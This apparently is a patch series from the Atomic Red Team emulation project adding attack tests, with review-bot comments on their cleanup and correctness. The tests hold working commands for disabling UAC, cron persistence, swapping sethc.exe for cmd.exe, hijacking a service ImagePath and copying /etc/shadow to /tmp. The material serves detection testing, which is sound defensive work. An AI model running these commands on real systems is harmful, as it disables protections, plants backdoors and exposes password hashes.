From 83b21a948773c86a9b62a826af2a11b58cf18463 Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Fri, 20 Nov 2020 17:17:23 +0100 Subject: [PATCH 01/13] atomic for disable UAC (#1289) Co-authored-by: P4T12ICK --- atomics/T1548.002/T1548.002.yaml | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 0154e2c8..5186a236 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -128,7 +128,7 @@ atomic_tests: - name: Bypass UAC using sdclt DelegateExecute auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 description: | - Bypasses User Account Control using a fileless method, registry only. + Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) 
@@ -147,4 +147,18 @@ atomic_tests: Start-Sleep -s 3 cleanup_command: | Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell +- name: Disable UAC using reg.exe + auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + description: | + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key + HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + supported_platforms: + - windows + executor: + command: | + reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f + cleanup_command: | + reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f + name: command_prompt + elevation_required: true From 52f440e80a122e93eea6ef587f8621a59ce5f07e Mon Sep 17 00:00:00 2001 From: zgdatadoghq <46688288+zgdatadoghq@users.noreply.github.com> Date: Mon, 23 Nov 2020 16:11:53 -0500 Subject: [PATCH 02/13] Expand cronjob tests - Expand to cover all cron subfolders - Add test to cover /var/spool/cron/crontabs/ folder --- atomics/T1053.003/T1053.003.yaml | 35 ++++++++++++++++++++++++++++++-- 1 file changed, 33 insertions(+), 2 deletions(-) diff --git a/atomics/T1053.003/T1053.003.yaml b/atomics/T1053.003/T1053.003.yaml index 3ff12d0b..c6f92aee 100644 --- a/atomics/T1053.003/T1053.003.yaml +++ b/atomics/T1053.003/T1053.003.yaml 
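Review bot: The `cleanup_command` of the new "Disable UAC using reg.exe" test sets EnableLUA back to 1 unconditionally, which assumes the host's value was 1 before the test ran; capturing the existing value first (`reg.exe QUERY ... /v EnableLUA` into a variable) or at least stating the assumption in the description would avoid leaving a host in a different state than it started. The description also has a typo, "Conrol" → "Control", and "changing its registry key" reads better as "changing the registry value". A change to EnableLUA generally only takes effect after a reboot, so the description should probably say that UAC is not observably disabled within the running session.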
@@ -30,10 +30,10 @@ atomic_tests: cleanup_command: | crontab /tmp/notevil -- name: Cron - Add script to cron folder +- name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: | - This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. supported_platforms: - macos 
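Review bot: The renamed test's new description lists /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly, but `supported_platforms` (the context line `- macos` just below it) still includes macOS, where those directories are not present on a default install, so the test would fail there unless they are created first. Either drop `macos` from the platform list or add a `dependencies` entry whose `prereq_command` checks that the directories exist. The test's executor block is in the next hunk.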
@@ -54,5 +54,36 @@ atomic_tests: name: bash command: | echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} cleanup_command: | rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + +- name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: | + This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + supported_platforms: + - linux + + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + + executor: + elevation_required: true + name: bash + command: | + echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + cleanup_command: | + rm /var/spool/cron/crontabs/#{cron_script_name} From 164da2cfa0e94a5b47ea2500281f83f55eb63ef1 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Fri, 27 Nov 2020 14:55:37 -0600 Subject: [PATCH 03/13] T1133 (#1295) Co-authored-by: Toua Lor --- atomics/T1133/T1133.yaml | 47 +++++++++ atomics/T1133/src/list of vpn extension.txt | 110 ++++++++++++++++++++ 2 files changed, 157 insertions(+) create mode 100644 atomics/T1133/T1133.yaml create mode 100644 atomics/T1133/src/list of vpn extension.txt diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml new file mode 100644 index 00000000..aa5b5012 --- /dev/null +++ b/atomics/T1133/T1133.yaml 
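Review bot: The new "/var/spool/cron/crontabs" test appends `#{command}` (default `echo 'Hello from Atomic Red Team' > /tmp/atomic.log`) into `/var/spool/cron/crontabs/#{cron_script_name}`, but files in that directory are per-user crontabs rather than scripts: each line needs the five schedule fields and the file name is expected to match an existing user, so cron will most likely ignore the default content and nothing will run. The `>>` append paired with a cleanup of `rm` also deletes any pre-existing crontab of that name instead of only the appended line; a cleanup that removes just that line, e.g. `sed -i '/Atomic Red Team/d' /var/spool/cron/crontabs/#{cron_script_name}`, and a default command carrying a schedule such as `* * * * * echo 'Hello from Atomic Red Team' > /tmp/atomic.log` would make the test do what its description claims. The three new `echo ... > /etc/cron.hourly|monthly|weekly/...` lines follow the existing daily line in writing a file with neither a shebang nor an execute bit, so run-parts may skip them; a `chmod +x` after each write, or a note in the description, would make the expected behaviour explicit.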
@@ -0,0 +1,47 @@ +--- +attack_technique: T1133 +display_name: External Remote Services + +atomic_tests: +- name: Running Chrome VPN Extensions via the Registry 2 vpn extension + description: | + Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list + + supported_platforms: + - windows + + input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: | + "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + + dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands + dependencies: # (optional) + - description: | + chrome must be installed + prereq_command: 'if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}' + get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + + executor: + name: powershell + elevation_required: true + command: | # these are the actaul attack commands, at least one command must be provided + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} 
+ Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands + $extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} \ No newline at end of file diff --git a/atomics/T1133/src/list of vpn extension.txt b/atomics/T1133/src/list of vpn extension.txt new file mode 100644 index 00000000..64c34497 --- /dev/null +++ b/atomics/T1133/src/list of vpn extension.txt 
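Review bot: The `prereq_command` checks `cmd /c "chrome 2>nul"`, which only succeeds when `chrome` resolves on PATH, while the executor launches the fixed path `C:\Program Files (x86)\Google\Chrome\Application\chrome.exe`; a standard install satisfies the second but not the first, so the prerequisite reports Chrome as missing and triggers a fresh download and install. Testing the path the executor actually uses keeps the two consistent: `if (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe") {exit 0} else {exit 1}`. `Stop-Process -Name "chrome"` ends every Chrome process on the host, not just the one the test started; keeping the object from `Start-Process -PassThru` and stopping that one would be less disruptive. The comment on `command: |` has a typo, "actaul" → "actual", and the `# (optional) ...` comments appear to be leftovers from the test template that can be removed.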
@@ -0,0 +1,110 @@ +ZenMate VPN - fdcgdnkidjaadafnichfpabhfomcebme +1clickVPN - fcfhplploccackoneaefokcmbjfbkenj +Touch VPN - bihmplhobchoageeokmgbdihknkjbknd +Hola Free VPN - gkojfkhlekighikafcpjkiklfbnlmeio +Astar VPN - jajilbjjinjmgcibalaakngmkilboobh +VPN Free - gjknjjomckknofjidppipffbpoekiipm +Earth VPN - nabbmpekekjknlbkgpodfndbodhijjem +DotVPN - kpiecbcckbofpmkkkdibbllpinceiihk +Hotspot Shield Free VPN - nlbejmccbhkncgokjcmghpfloaajcffj +Browsec VPN - omghfjlpggmjjaagoclmmobgdodcjboh +VPN-free.pro - bibjcjfmgapbfoljiojpipaooddpkpai +VPN Unlimited Free - mpcaainmfjjigeicjnlkdfajbioopjko +PP VPN - jljopmgdobloagejpohpldgkiellmfnc +IP Unblock - lochiccbgeohimldjooaakjllnafhaid +Surf VPN - nhnfcgpcbfclhfafjlooihdfghaeinfc +iNinja VPN - ookhnhpkphagefgdiemllfajmkdkcaim +Daily VPN - namfblliamklmeodpcelkokjbffgmeoo +Hoxx VPN Proxy - nbcojefnccbanplpoffopkoepjmhgdgh +Free VPN - majdfhpaihoncoakbjgbdhglocklcgno +VPN PROXY MASTER - lnfdmdhmfbimhhpaeocncdlhiodoblbd +Urban Free VPN - eppiocemhmnlbhjplcgkofciiegomcon +SaferVPN Proxy - cocfojppfigjeefejbpfmedgjbpchcng +VPN Professional - foiopecknacmiihiocgdjgbjokkpkohc +AdGuard VPN - hhdobjgopfphlmjbmnpglhfcgppchgje +Free VPN - jgbaghohigdbgbolncodkdlpenhcmcge +Free One Touch VPN - inligpkjkhbpifecbdjhmdpcfhnlelja +Unlimited VPN & Proxy by ibVPN - higioemojdadgdbhbbbkfbebbdlfjbip +RusVPN - hipncndjamdcmphkgngojegjblibadbe +Azino VPN - iolonopooapdagdemdoaihahlfkncfgg +Pron VPN - nhfjkakglbnnpkpldhjmpmmfefifedcj +Free Residential VPN - jpgljfpmoofbmlieejglhonfofmahini +ExpressVPN - fgddmllnllkalaagkghckoinaemmogpe +Hotspot Shield Elite VPN Proxy - ejkaocphofnobjdedneohbbiilggdlbi +Hide My IP VPN - keodbianoliadkoelloecbhllnpiocoi +Tunnello VPN - hoapmlpnmpaehilehggglehfdlnoegck +HMA VPN Proxy Unblocker - poeojclicodamonabcabmapamjkkmnnk +Free Avira Phantom VPN - dfkdflfgjdajbhocmfjolpjbebdkcjog +Hola VPN - kcdahmgmaagjhocpipbodaokikjkampi +Free VPN for Chrome - klnkiajpmpkkkgpgbogmcgfjhdoljacg +Hub VPN - 
lneaocagcijjdpkcabeanfpdbmapcjjg +Free Proxy VPN - pgfpignfckbloagkfnamnolkeaecfgfh +Private Internet Access - jplnlifepflhkbkgonidnobkakhmpnmh +Turbo VPN for PC - jliodmnojccaloajphkingdnpljdhdok +Windscribe - hnmpcagpplmpfojmgmnngilcnanddlhb +CyberGhost VPN - ffbkglfijbcbgblgflchnbphjdllaogb +VPN.AC - kcndmbbelllkmioekdagahekgimemejo +Browser VPN - jdgilggpfmjpbodmhndmhojklgfdlhob +DEEPRISM VPN - bihhflimonbpcfagfadcnbbdngpopnjb +My Browser Vpn - ppajinakbfocjfnijggfndbdmjggcmde +SetupVPN - oofgbpoabipfcfjapgnbbjjaenockbdp +Wachee VPN - bhnhkdgoefpmekcgnccpnhjfdgicfebm +Thunder Proxy - knmmpciebaoojcpjjoeonlcjacjopcpf +Free Proxy VPN - dhadilbmmjiooceioladdphemaliiobo +FastestVPN Proxy - jedieiamjmoflcknjdjhpieklepfglin +WorkingVPN - mhngpdlhojliikfknhfaglpnddniijfh +TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa +BelkaVPN - npgimkapccfidfkfoklhpkgmhgfejhbj +VPN Master - akeehkgglkmpapdnanoochpfmeghfdln +Unblock Websites - gbmdmipapolaohpinhblmcnpmmlgfgje +Lethean Proxy VPN - aigmfoeogfnljhnofglledbhhfegannp +Whoer VPN - cgojmfochfikphincbhokimmmjenhhgk +Best VPN USA - ficajfeojakddincjafebjmfiefcmanc +FREE VPN DEWELOPMENT - ifnaibldjfdmaipaddffmgcmekjhiloa +apkfold free vpn - jbnmpdkcfkochpanomnkhnafobppmccn +Soul VPN - apcfdffemoinopelidncddjbhkiblecc +DotVPN - mjolnodfokkkaichkcjipfgblbfgojpa +rderzh VPN Proxy - oifjbnnafapeiknapihcmpeodaeblbkn +Red Panda VPN - plpmggfglncceinmilojdkiijhmajkjh +Ultrareach VPN - mjnbclmflcpookeapghfhapeffmpodij +FastStunnel VPN - bblcccknbdbplgmdjnnikffefhdlobhp +VirtualShield VPN - aojlhgbkmkahabcmcpifbolnoichfeep +Adblock Office VPN Proxy Server - lcmammnjlbmlbcaniggmlejfjpjagiia +Guru VPN & Proxy - knajdeaocbpmfghhmijicidfcmdgbdpm +Malus VPN - bdlcnpceagnkjnjlbbbcepohejbheilk +Muscle VPN - edknjdjielmpdlnllkdmaghlbpnmjmgb +Push VPN - eidnihaadmmancegllknfbliaijfmkgo +Gom VPN - ckiahbcmlmkpfiijecbpflfahoimklke +Free Fast VPN - macdlemfnignjhclfcfichcdhiomgjjb +BullVPN - chioafkonnhbpajpengbalkececleldf +HideAll VPN - 
amnoibeflfphhplmckdbiajkjaoomgnj +ProxyFlow - llbhddikeonkpbhpncnhialfbpnilcnc +Cloud VPN - pcienlhnoficegnepejpfiklggkioccm +sVPN - iocnglnmfkgfedpcemdflhkchokkfeii +Social VPN - igahhbkcppaollcjeaaoapkijbnphfhb +Trellonet Trellonet - njpmifchgidinihmijhcfpbdmglecdlb +WindmillVPN - ggackgngljinccllcmbgnpgpllcjepgc +IPBurger Proxy & VPN - kchocjcihdgkoplngjemhpplmmloanja +Veee - bnijmipndnicefcdbhgcjoognndbgkep +Anonymous Proxy Vpn Browser - lklekjodgannjcccdlbicoamibgbdnmi +Hideman VPN - dbdbnchagbkhknegmhgikkleoogjcfge +Fornex VPN - egblhcjfjmbjajhjhpmnlekffgaemgfh +WeVPN - ehbhfpfdkmhcpaehaooegfdflljcnfec +VPNMatic - bkkgdjpomdnfemhhkalfkogckjdkcjkg +Urban Shield - almalgbpmcfpdaopimbdchdliminoign +Prime VPN - akkbkhnikoeojlhiiomohpdnkhbkhieh +westwind - gbfgfbopcfokdpkdigfmoeaajfmpkbnh +Upnet - bniikohfmajhdcffljgfeiklcbgffppl +uVPN - lejgfmmlngaigdmmikblappdafcmkndb +Nucleus VPN - ffhhkmlgedgcliajaedapkdfigdobcif +Touch VPN - bihmplhobchoageeokmgbdihknkjbknd +FoxyProxy Standard - gcknhkkoolaabfmlnjonogaaifnjlfnp +GeoProxy - pooljnboifbodgifngpppfklhifechoe +NordVPN - fjoaledfpmneenckfbpdfhkmimnjocfa +ProxFlow - aakchaleigkohafkfjfjbblobjifikek +Proxy SwitchySharp - dpplabbmogkhghncfbfdeeokoefdjegm +Proxy SwitchyOmega - padekgcemlokbadohgkifijomclgjgif +PureVPN - bfidboloedlamgdmenmlbipfnccokknp +RusVPN - hipncndjamdcmphkgngojegjblibadbe +SaferVPN - cocfojppfigjeefejbpfmedgjbpchcng +TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa \ No newline at end of file From 9ec5d7dd9afbd875a706d1339cd631c4bbff8991 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Fri, 27 Nov 2020 14:57:42 -0600 Subject: [PATCH 04/13] Update T1218 Test 5 (#1296) default path contains a space and the command needs to be surrounded by quotes. Co-authored-by: Carrie Roberts --- atomics/T1218/T1218.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 0b10961a..1c1e297d 100644 --- a/atomics/T1218/T1218.yaml 
+++ b/atomics/T1218/T1218.yaml @@ -122,4 +122,4 @@ atomic_tests: name: command_prompt elevation_required: false command: | - #{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}" + "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" From 91ea164b8e4d34bf0e0f7b1967993c7fdd5bc28a Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Fri, 27 Nov 2020 22:13:05 +0100 Subject: [PATCH 05/13] new atomic (#1298) Co-authored-by: P4T12ICK Co-authored-by: Carrie Roberts --- atomics/T1546.008/T1546.008.yaml | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml index 4ddefabb..fda9c6b0 100644 --- a/atomics/T1546.008/T1546.008.yaml +++ b/atomics/T1546.008/T1546.008.yaml @@ -25,7 +25,7 @@ atomic_tests: $input_table = "#{parent_list}".split(",") $Name = "Debugger" $Value = "#{attached_process}" - Foreach ($item in $input_table){ + Foreach ($item in $input_table){ $item = $item.trim() $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" IF(!(Test-Path $registryPath)) @@ -47,4 +47,19 @@ atomic_tests: } name: powershell elevation_required: true - +- name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: | + Replace sticky keys binary (sethc.exe) with cmd.exe + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: | + copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + name: command_prompt + elevation_required: true From d5e64a6d879e09d08bc10b679cf4305a2451810d Mon Sep 17 00:00:00 2001 
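Review bot: In the new "Replace binary of sticky keys" test, `cleanup_command` copies the backup back over sethc.exe but leaves `sethc_backup.exe` in System32 and keeps the ownership and ACL changes made by `takeown` and `icacls`, so the cleanup does not return the file to its original protection. Adding `del C:\Windows\System32\sethc_backup.exe`, removing the added grant with `icacls C:\Windows\System32\sethc.exe /remove:g Administrators`, and restoring ownership with `icacls C:\Windows\System32\sethc.exe /setowner "NT SERVICE\TrustedInstaller"` would leave the host much closer to its starting state. The description could also state that the test leaves a modified system binary in place until cleanup runs, since that is the condition a detection for this technique keys on.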
From: P4T12ICK Date: Fri, 27 Nov 2020 22:15:29 +0100 Subject: [PATCH 06/13] New atomic t1574 011 (#1301) * new atomic * new atomic * new atomic * new atomic Co-authored-by: P4T12ICK Co-authored-by: Carrie Roberts --- atomics/T1574.011/T1574.011.yaml | 37 ++++++++++++++++++++++++++++++-- 1 file changed, 35 insertions(+), 2 deletions(-) diff --git a/atomics/T1574.011/T1574.011.yaml b/atomics/T1574.011/T1574.011.yaml index 1699ec27..2d13e804 100644 --- a/atomics/T1574.011/T1574.011.yaml +++ b/atomics/T1574.011/T1574.011.yaml @@ -4,7 +4,7 @@ atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a description: | - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows 
@@ -17,4 +17,37 @@ atomic_tests: command: | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL - name: powershell \ No newline at end of file + name: powershell +- name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: | + Change Service registry ImagePath of a bengin service to a malicious file + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: '%windir%\system32\win32calc.exe' + malicious_service_path: + description: malicious service path + type: String + default: '%windir%\system32\cmd.exe' + dependency_executor_name: powershell + dependencies: + - description: | + The service must exist (#{weak_service_name}) + prereq_command: | + if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} + get_prereq_command: | + sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + executor: + command: | + reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" + cleanup_command: | + sc.exe delete #{weak_service_name} + name: command_prompt From 2b4c7c0112f1071947ea4c9e3aea2de18376c8ee Mon Sep 17 00:00:00 2001 From: zgdatadoghq <46688288+zgdatadoghq@users.noreply.github.com> Date: Mon, 30 Nov 2020 11:12:21 -0500 Subject: [PATCH 07/13] Add two T1003.008 tests (#1299) * Create T1003.008.yaml * Create T1003.008.md * Update T1003.008.md Co-authored-by: Carl <57147304+rc-grey@users.noreply.github.com> --- atomics/T1003.008/T1003.008.md | 80 ++++++++++++++++++++++++++++++++ atomics/T1003.008/T1003.008.yaml | 40 ++++++++++++++++ 2 files changed, 120 insertions(+) create mode 100644 atomics/T1003.008/T1003.008.md create mode 100644 atomics/T1003.008/T1003.008.yaml 
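Review bot: The new "Service ImagePath Change with reg.exe" executor writes to `HKLM\SYSTEM\CurrentControlSet\Services\...` but carries no `elevation_required: true`, unlike the other new tests in this series; the `sc.exe create` in `get_prereq_command` needs the same privilege, so the test will fail with access denied when run unprivileged. The `cleanup_command` `sc.exe delete #{weak_service_name}` removes the service even when it pre-existed (the case in which `prereq_command` passed without the test creating it); restoring the original value instead, `reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{weak_service_path}"`, and only deleting a service the test itself created, would be safer. Also "bengin" → "benign" in the description.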
diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md new file mode 100644 index 00000000..c5d38f78 --- /dev/null +++ b/atomics/T1003.008/T1003.008.md @@ -0,0 +1,80 @@ +# T1003.008 - /etc/passwd and /etc/shadow +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003/008) +
Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) + +The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db +
+ +## Atomic Tests + +- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local) + + +
+ +## Atomic Test #1 - Access /etc/shadow (Local) +/etc/shadow file is accessed in Linux environments + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +sudo cat /etc/shadow > #{output_file} +cat #{output_file} +``` + +#### Cleanup Commands: +```bash +rm -f #{output_file} +``` + + + + + +
+
+ +## Atomic Test #2 - Access /etc/passwd (Local) +/etc/passwd file is accessed in Linux environments + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| + + +#### Attack Commands: Run with `sh`! + + +```sh +cat /etc/passwd > #{output_file} +cat #{output_file} +``` + +#### Cleanup Commands: +```sh +rm -f #{output_file} +``` + + + + + +
diff --git a/atomics/T1003.008/T1003.008.yaml b/atomics/T1003.008/T1003.008.yaml new file mode 100644 index 00000000..68ddee87 --- /dev/null +++ b/atomics/T1003.008/T1003.008.yaml @@ -0,0 +1,40 @@ +attack_technique: T1003.008 +display_name: 'OS Credential Dumping: /etc/passwd and /etc/shadow' +atomic_tests: +- name: Access /etc/shadow (Local) + auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 + description: | + /etc/shadow file is accessed in Linux environments + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.008.txt + executor: + command: | + sudo cat /etc/shadow > #{output_file} + cat #{output_file} + cleanup_command: | + rm -f #{output_file} + name: bash + elevation_required: true +- name: Access /etc/passwd (Local) + auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d + description: | + /etc/passwd file is accessed in Linux environments + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.008.txt + executor: + command: | + cat /etc/passwd > #{output_file} + cat #{output_file} + cleanup_command: | + rm -f #{output_file} + name: sh From e9cb3c2f599c949c9540cae0d17e839891409061 Mon Sep 17 00:00:00 2001 
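Review bot: The "Access /etc/shadow (Local)" test runs `sudo cat /etc/shadow` while also setting `elevation_required: true`, so the runner already executes it as root and the inner `sudo` is redundant (and can hang on a password prompt where sudo is not configured for the executing user); drop `sudo` and rely on `elevation_required`, or the reverse, matching how the /etc/passwd test is written. The redirect into `#{output_file}` (default `/tmp/T1003.008.txt`) creates the file with the process umask, so the copied password hashes may be readable by other local users until cleanup runs; prefixing the command with `umask 077;` would keep the copy private to root. The two tests also use different executors (`bash` vs `sh`) for equivalent commands, which is worth unifying.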
From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> Date: Mon, 30 Nov 2020 11:18:32 -0500 Subject: [PATCH 08/13] Update README.md (#1302) * Update README.md Updating execution frameworks link. * Generate docs from job=validate_atomics_generate_docs branch=mgraeber-rc-patch-1 * Generate docs from job=validate_atomics_generate_docs branch=mgraeber-rc-patch-1 Co-authored-by: CircleCI Atomic Red Team doc generator Co-authored-by: Michael Haag --- README.md | 2 +- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 24 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 11 +- atomics/Indexes/Indexes-CSV/macos-index.csv | 6 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 13 +- atomics/Indexes/Indexes-Markdown/index.md | 30 +- .../Indexes/Indexes-Markdown/linux-index.md | 13 +- .../Indexes/Indexes-Markdown/macos-index.md | 6 +- .../Indexes/Indexes-Markdown/windows-index.md | 17 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 6 +- atomics/Indexes/Matrices/windows-matrix.md | 4 +- atomics/Indexes/index.yaml | 598 ++++++++++++++++-- atomics/T1003.008/T1003.008.md | 12 +- atomics/T1016/T1016.md | 31 + atomics/T1016/T1016.yaml | 1 + atomics/T1053.003/T1053.003.md | 48 +- atomics/T1069.002/T1069.002.md | 1 + atomics/T1133/T1133.md | 66 ++ atomics/T1133/T1133.yaml | 1 + atomics/T1218/T1218.md | 2 +- atomics/T1222.001/T1222.001.md | 58 +- atomics/T1546.008/T1546.008.md | 35 +- atomics/T1548.002/T1548.002.md | 33 +- atomics/T1574.011/T1574.011.md | 51 +- atomics/used_guids.txt | 9 + 29 files changed, 979 insertions(+), 107 deletions(-) create mode 100644 atomics/T1133/T1133.md diff --git a/README.md b/README.md index 51788ec0..7c0d1a5e 100644 --- a/README.md +++ b/README.md 
